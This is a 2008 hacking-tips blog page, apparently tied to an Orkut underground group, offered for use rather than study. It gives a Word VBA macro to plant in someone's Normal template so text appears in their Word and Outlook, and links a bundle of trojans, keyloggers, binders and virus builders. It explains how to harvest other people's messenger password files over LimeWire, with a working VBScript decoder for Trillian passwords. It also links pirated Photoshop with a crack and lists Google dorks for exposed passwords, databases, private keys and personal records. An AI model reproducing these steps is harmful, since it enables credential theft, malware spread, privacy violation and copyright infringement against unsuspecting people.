Tuesday, September 16, 2008

[COD/ Trick] How to Screw MS Word -:))


This next prank does exactly that. While you are typing in a word document or outlook a random swear word will appear. The words will appear in random increments and the words them selves are random. The words and the time gap is determined by you.

Step 1: Open Microsoft Word
Step 2: Press Alt F-11 (This will open the VBA Editor)

Step 3: Select your Normal Template by double clicking “This Document”
Step 4: Copy the code below into your normal template. Remember to re-type any “s, they dont always transfer over correctly in the copy/paste process.


Sub typeRand()
Dim counter As String
counter = CStr(Int((30 - 1 + 1) * Rnd + 1))
Application.OnTime When:=Now + TimeValue(”00:00:” + counter), _
Name:=”TimedClose”
End Sub
Sub TimedClose()
Dim maindocument As Document
Set maindocument = activedocument
counter = CStr(Int((5 - 1 + 1) * Rnd + 1))
Select Case counter
Case 1
Selection.TypeText Text:=” OUG ROXxX ”
Case 2
Selection.TypeText Text:=” I Love OUG ”
Case 3
Selection.TypeText Text:=” OUG - We will We will Rock You ”
Case 4
Selection.TypeText Text:=” OUG - Orkut Underground ”
Case 5
Selection.TypeText Text:=” OUG - Join Us, Its Fun ”
End Select
Call typeRand
End Sub


Step 5: Close Microsoft Word



Continued...

Step 6: Enjoy

If you have done this correctly the code will load when the person loads Word. Currently there are 5 swear words. They randomly appear any where between 30 and 1 second. This code will load the second they start using word. So if the person doesn’t even type it will start going. It will affect both word and outlook. Below are some tips on how to modify the code.


Edit Swear Words

You can add any number of words you want. To increase the number of swear words only takes a couple tweaks

If you want to have a total of 20 swear words change the 5 in bold to 20.
Before:

counter = CStr(Int((5 - 1 + 1) * Rnd + 1))
After
counter = CStr(Int((20 - 1 + 1) * Rnd + 1))

The next step is to add the swear words. Currently there are 5 swear words. To add a new swear word, repeat the following till you reached the desired amount. After the last statement Case 5, Add Case 6

Case 5
Selection.TypeText Text:=” Text 1 ”

Case 6
Selection.TypeText Text:=” Text 2 “

Case 7
Selection.TypeText Text:=” Text 3 “


When you have added all the swear words you want make sure to finish with, End Select.
Edit Time Range

To change the random number range do as follows:

The maximum number comes first and is in bold

counter = CStr(Int((30 - 1 + 1) * Rnd + 1))

To change the maxium simply change the number 30 to something less than or equal to 59
To change the minimum number change the numbers in bold

counter = CStr(Int((20 - 1 + 1) * Rnd + 1))

I recommend keep this at 1 second but changing it wont hurt


How to Reverse the code
Press Alt-F11 and re-open your normal document. Erase the code and restart word.


Hope all enjoy the fun!
-:)) enjoy

credits:- evil who find dis -:))

Ultimate Hacking Experience 2008 =D


Ultimate Hacking Experience 2008 Size: 52,15 MB Trojan Horses - Yuri RAT v1.2 - MofoTro v1.7 BETA - Charon - Beast v2.0.7 - Omerta v1.3 - Theef v2.10 - Combined Forces R.A.T - MoSucker v3.0 - ProRat v1.9 Fix2 Keyloggers - Elite Keylogger v1.0 - SKL v0.1 - KeySpy v2.0 - A++++- Curiosity - Keylogger - KeyCopy Binders - Daemon Crypt Public v2 - NT Packer v2.1 - EES binder v1.0 - File Injector v3 - Bytes Adder - FreshBind v2.01 - YAB v2.01 - NakedBind v1.0 - Amok Joiner WebHacks/WordLists Brute Forcers - Munga Bunga s Official - Brutus - Authentication Engine Test 2 - wwwHack v1.946 - FTP Brute Hacker - FTP Brute Forcer.tar.gz - Unix- Wbrute.tar.gz - Unix- Shadow Scanner -Brute Forcer - Hackers Utility v1.5 - POP3 brute forcer.tar.gz - Unix CGI-Bug Scanners - NStealth HTTP Security Scanner v5.8 - Attack Toolkit v4.1 & source code included - Scanarator- Legion NetBios Scanner v2.1 - NetView v1.0 - CGI Vulnerability Scan - CGI Scanner v4.0 - VoidEye CGI scanner Virus! Viruses - Hippi virus - Sasser- W32. Blaster .Worm - Midnight Massacre - 00001 - Nimda - Loveletter virus - Happy 99 - MXZ Virus Builders - DR VBS - VBSwg 2 beta - Virus builder - p0ke s WormGen 2.0 - RESIDUO - DoS Virus MSN Hacks & Bots - HoaX Toolbox 1.1 - MSN Extreme 3.0 - MessenPass v1.06 - Advanced Blood Scroller - Nudge Madness - Advanced Instant Messengers Password Recovery - Contact Spy - Msn Explosion - Encrypted Messenger Port & IP Scanners - Blues Port Scanner - ProPort v2.2 - SuperScan v3.0 - Net Scan Tools v4.2 - LanSpy v2.0 - ~censored~ Threads v3.1 - Trojan Hunter v1.5 - SuperScan v4.0 - Neotrace PRO v3.25 trial&crack Nukers And Flooders - Rocket v1.0 - RPCNuke v1.0 - Panther Mode1 - 56k - Panther Mode2 - ISDN + - Final Fortune v2.4 - Battle Pong - Technophoria - Assault v1.0 - ICMP Nuker - CLICK v2.2 EXTRA! - Telnet Tutorial. Download: (Size: 52,15 MB)



http://rapidshare.com/files/140096242/Ultimate_hack_2008_www.softarchive.net.rar

enjoy -:))

▓Hack Passwords using Limewire▓


1.The newest verion of LimeWire is here:
http://www.limewire.com/download/index.php

2. Open "Notepad"
3. Copy and Paste the following code into Notepad
Dim key, keys, pwd, pwds, pwdl, maxval, goods, x
key = "243,038,129,196,057,134,219,146,113,163,185,2 30,0 83,122,149," & _

"124,000,000,000,000,000,000,255,000,000,128,0 00,0 00,000,128," & _

"128,000,255,000,000,000,128,000,128,000,128,1 28,0 00,000,000," & _

"128,255,000,128,000,255,000,128,128,128,000,0 85,1 10,097,098," & _

"108,101,032,116,111,032,114,101,115,111,108,1 18,1 01,032,072," & _

"084,084,080,032,112,114,111,120,000"

keys = split(key, ",")

main()

sub main()

pwd = ""

pwd = inputbox("Enter the Encrypted Trillian Password", "", "")

if pwd = "" then exit sub

pwd = trim(pwd)

pwdl = len(pwd)/2

redim pwds(pwdl-1)

for x = 0 to ubound(pwds)

'msgbox mid(pwd,(x * 2)+1,2)

pwds(x) = int("&h" & mid(pwd,(x * 2)+1,2))

next

if ubound(pwds) > ubound(keys) then

maxval = ubound(keys)

else

maxval = ubound(pwds)

end if

for x = 0 to maxval

goods = goods & chr(pwds(x) xor keys(x))

next

inputbox "Decrypted Password","",goods

end sub

4. Select FILE and choose SAVE AS

5. From the "Save as Type" drop-down menu select "All Files (*.*)"

6. Save the file as "TrillianPass.vbs" in the desired folder. Remember it's location.

7. Start LimeWire
8. Initiate a search for the following files:
aim.ini
yahoo.ini
msn.ini

9. Download any results that match the above file names. Note:
Only download files that are in lowercase letters.
Most files above 6 or 7 KB will not be the files your looking for.

10. Open the downloaded file in Notepad.

11. The screen name, CoolGuy1234, and the encrypted password can be seen. Now the password must be decrypted. Highlight and copy the encrypted password.

12. Open the file that was created earlier: TrillianPass.vbs

13. Paste the encryped password into the Trillian Password Cracker and press "OK" to reveal the real password 

-------------------------------------------------------------------------------------

How this works:

The people from whom you are downloading files (which contain passwords) have the programs Trillian and LimeWire (or a similar file sharing program). These people are sharing all of the files on their computer with people around the globe/country. This is because their LimeWire program's preferences are set to share a whole drive instead of just one or two folders .


i don no its 100 % workin  or not try it -:((

[GFX]Adobe Photoshop CS4 download links


Finally here 

Tested. Working great for me :-)




Adobe Photoshop CS4 is a leaked version from Adobe,
which is currently in Beta stage.
This package includes all features plus a working keygenerator.

The Adobe Photoshop family of products is the ultimate playground
for bringing out the best in your digital images and transforming them
into anything you can imagine.

Size: 434MB 


Download:
http://rapidshare.com/files/123595528/APSCS4.By.MechoDownload.part1.rar .
http://rapidshare.com/files/123595501/APSCS4.By.MechoDownload.part2.rar .
http://rapidshare.com/files/123604991/APSCS4.By.MechoDownload.part3.rar .
http://rapidshare.com/files/123606426/APSCS4.By.MechoDownload.part4.rar .
http://rapidshare.com/files/123626826/APSCS4.By.MechoDownload.part5.rar .

Rar Password:
TADJ@mechodownload


100% Working Crack:
http://rapidshare.com/files/145700417/Adobe_Photoshop_CS4_WDA.rar

bump lol

bump

[TRICK]*multiple login for Google talk* & Yahoo



g-talk..
1. Right-click on the desktop

2. Select New

3. Select Shortcut

4. Paste this into the text box:
"c:\program files\google\google talk\googletalk.exe" /nomutex
(dont miss even a comma)

5. Click Next6. Name it whatever: Google Talk Multiple, etc.

8. Click OK until you are done.





ENJOY>>>>>>>>>>>>>>>>>>>>>>



yahoo/...**
multiple login for yahoo!!!
You can login with multiple id's on the same yahoo messenger without any download or patch .
Follow these steps
1. Go to Start ----> Run . Type regedit, then enter .

2.Navigate to HKEY_CURRENT_USER --------> Software --->yahoo ----->pager---->Test

3.On the right pane , right-click and choose new Dword value .

4.Rename it as Plural.

5.Double click and assign a decimal value of 1.


That's it done!!
Now close registry and restart yahoo messenger .For signing in with new id open another messenger .

enjoY -:|

[OFF]GOOGLE DORKS -:|



Limited to strings as there are beggars that will try to squeeze you for instructions and such...

No further explanation will be provided

robots.txt" "Disallow:" filetype:txt
intitle:index.of passwd passwd.bak
intitle:index.of haccess.ctl
intitle:index.of dead.letter
filetype:xls username password email
inurl:admin filetype:xls
"Thank you for your purchase" +download
intitle:"DocuShare"
inurl:"docushare/dsweb/" -faq -gov -edu
"#mysql dump" filetype:sql
"allow_call_time_pass_reference" "PATH_INFO"
"Certificate Practice Statement" filetype:PDF | DOC
"Generated by phpSystem"
"generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"Index of" / "chat/logs"
"Installed Objects Scanner" inurl:default.asp
"Mecury Version" "Infastructure Group"
"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
"Most Submitted Forms and Scripts" "this section"
"Network Vulnerability Assessment Report"
"not for distribution" confidential
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"phpMyAdmin" "running on" inurl:"main.php"
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"sets mode: +p"
"sets mode: +s"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intextassword|subject
(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
+":8080" +":3128" +":80" filetype:txt
+"HSTSNR" -"netop.com"
-sitehp.net -"The PHP Group" inurl:source inurl:url extHp
94FBR "ADOBE PHOTOSHOP"
AIM buddy lists

allinurl:/examples/jsp/snp/snoop.jsp
allinurl:servlet/SnoopServlet
cgiirc.conf
cgiirc.conf
data filetype:mdb -site:gov -site:mil
exported email addresses
ext:asp inurlathto.asp
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ini intext:env.ini
ext:ldif ldif
ext:log "Software: Microsoft Internet Information Services *.*"
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
extqi pqi -database
ext:reg "username=*" putty
ext:txt "Final encryption key"
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
filetype:fp7 fp7
filetype:inf inurl:capolicy.inf
filetype:lic lic intext:key
filetype:log access.log -CVS
filetype:mbx mbx intext:Subject
filetype:myd myd -CVS
filetype:ns1 ns1
filetypera ora
filetypedb pdb backup (Pilot | Pluckerdb)
filetypehp inurl:index inurlhpicalendar -site:sourceforge.net
filetypeot inurl:john.pot
filetypest inurl:"outlook.pst"
filetypest pst -from -to -date
filetype:qbb qbb
filetype:rdp rdp
filetype:reg "Terminal Server Client"
filetype:vcs vcs
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:"email.xls"
Financial spreadsheets: finance.xls
Financial spreadsheets: finances.xls
Ganglia Cluster Reports
haccess.ctl (one way)
haccess.ctl (VERY reliable)
ICQ chat logs, please...
iletype:log cron.log
intext:"Session Start * * * *:*:* *" filetype:log
intext:"Tobias Oetiker" "traffic analysis"
intextpassword | passcode) intextusername | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"AppServ Open Project" -site:www.appservnetwork.com
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intitle:"Big Sister" +"OK Attention Trouble"
intitle:"edna:streaming mp3 server" -forums
intitle:"FTP root at"
intitle:"index of" +myd size
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index Of" cookies.txt size
intitle:"index of" mysql.conf OR mysql_config
intitle:"Index of" upload size parent directory
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"Multimon UPS status page"
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"statistics of" "advanced web statistics"
intitle:"System Statistics" +"System and Network Information Center"
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"wbem" compaq login
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"welcome.to.squeezebox"
intitle:admin intitle:login
intitle:index.of "Apache" "server at"
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
inurl:"/axs/ax-admin.pl" -script
inurl:"/cricket/grapher.cgi"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"putty.reg"
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:*db filetype:mdb
inurl:/_layouts/settings
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:changepassword.asp
inurl:ds.py
inurl:email filetype:mdb
inurl:fcgi-bin/echo
inurl:forum filetype:mdb
inurl:forward filetype:forward -cvs
inurl:getmsg.html intitle:hotmail
inurl:log.nsf -gov
inurl:main.php phpMyAdmin
inurl:main.php Welcome to phpMyAdmin

inurl:netscape.hst
inurl:netscape.hst
inurl:netscape.ini
inurldbc.ini ext:ini -cvs
inurlerl/printenv
inurlhp.ini filetype:ini
inurlreferences.ini "[emule]"
inurlrofiles filetype:mdb
inurl:report "EVEREST Home Edition "
inurl:server-info "Apache Server Information"
inurl:server-status "apache"
inurl:snitz_forums_2000.mdb
inurl:ssl.conf filetype:conf
inurl:tdbin
inurl:vbstats.php "page generated"
ipsec.conf
ipsec.secrets
ipsec.secrets
Lotus Domino address books
mail filetype:csv -site:gov intext:name
Microsoft Money Data Files
mt-db-pass.cgi files
MySQL tabledata dumps
mystuff.xml - Trillian data files
OWA Public Folders (direct view)
Peoples MSN contact lists
php-addressbook "This is the addressbook for *" -warning
phpinfo()
phpMyAdmin dumps
phpMyAdmin dumps
private key files (.csr)
private key files (.key)
Quicken data files
robots.txt
site:edu admin grades
SQL data dumps
Squid cache server reports
Unreal IRCd
ntitlehpinfo "PHP Version"
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq
"#mysql dump" filetype:sql
"allow_call_time_pass_reference" "PATH_INFO"
"Certificate Practice Statement" filetype:PDF | DOC
"Generated by phpSystem"
"This summary was generated by wwwstat"
"Host Vulnerability Summary Report"
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"Index of" / "chat/logs"
"Installed Objects Scanner" inurl:default.asp
"Mecury Version" "Infastructure Group"
"Microsoft (R) Windows * (TM) Version * DrWtsn32 C
"Most Submitted Forms and Scripts" "this section"
"Network Vulnerability Assessment Report"
+"HSTSNR" -"netop.com"
"not for distribution" confidential
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"phpMyAdmin" "running on" inurl:"main.php"
"These statistics were produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"sets mode: +p"
"sets mode: +s"
"Thank you for your order" +receipt
"This is a Shareaza Node"
"This report was generated by WebLog"
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intextassword|subject
(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
+":8080" +":3128" +":80" filetype:txt
buddylist.blt
allinurl:/examples/jsp/snp/snoop.jsp
allinurl:servlet/SnoopServlet
intitle:index.of cgiirc.config
data filetype:mdb -site:gov -site:mil
e-mail address filetype:csv csv
ext:asp inurlathto.asp
ext:cgi inurl:editcgi.cgi inurl:file=
ext:conf inurl:rsyncd.conf -cvs -man
ext:conf NoCatAuth -cvs
ext:dat bpk.dat
ext:gho gho
ext:ini intext:env.ini
ext:ldif ldif
ext:log "Software: Microsoft Internet Information
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:nsf nsf -gov -mil
extqi pqi -database
ext:reg "username=*" putty
ext:txt "Final encryption key"
ext:txt inurl:dxdiag
ext:vmdk vmdk
ext:vmx vmx
filetype:bkf bkf
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:cfg auto_inst.cfg
letype:cnf inurl:_vti_pvt access.cnf
inurl:*db filetype:mdb
inurl:"shopadmin.asp" "Shop Administrators only"
inurl:getmsg.html intitle:hotmail
inurl:admin intitle:login
inurl:backup filetype:mdb
inurl:admin filetype:xls
intitle:index.of "Apache" "server at"
intitle:admin intitle:login
intitle:"FTP root at"
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intext:SQLiteManager inurl:main.php
intext:gmail invite intext:http://gmail.google.com/gmail/a
intextpassword | passcode) intextusername | userid | user) filetype:csv
intitlehpinfo "PHP Version"

----------------------------------------
ENJOY -:))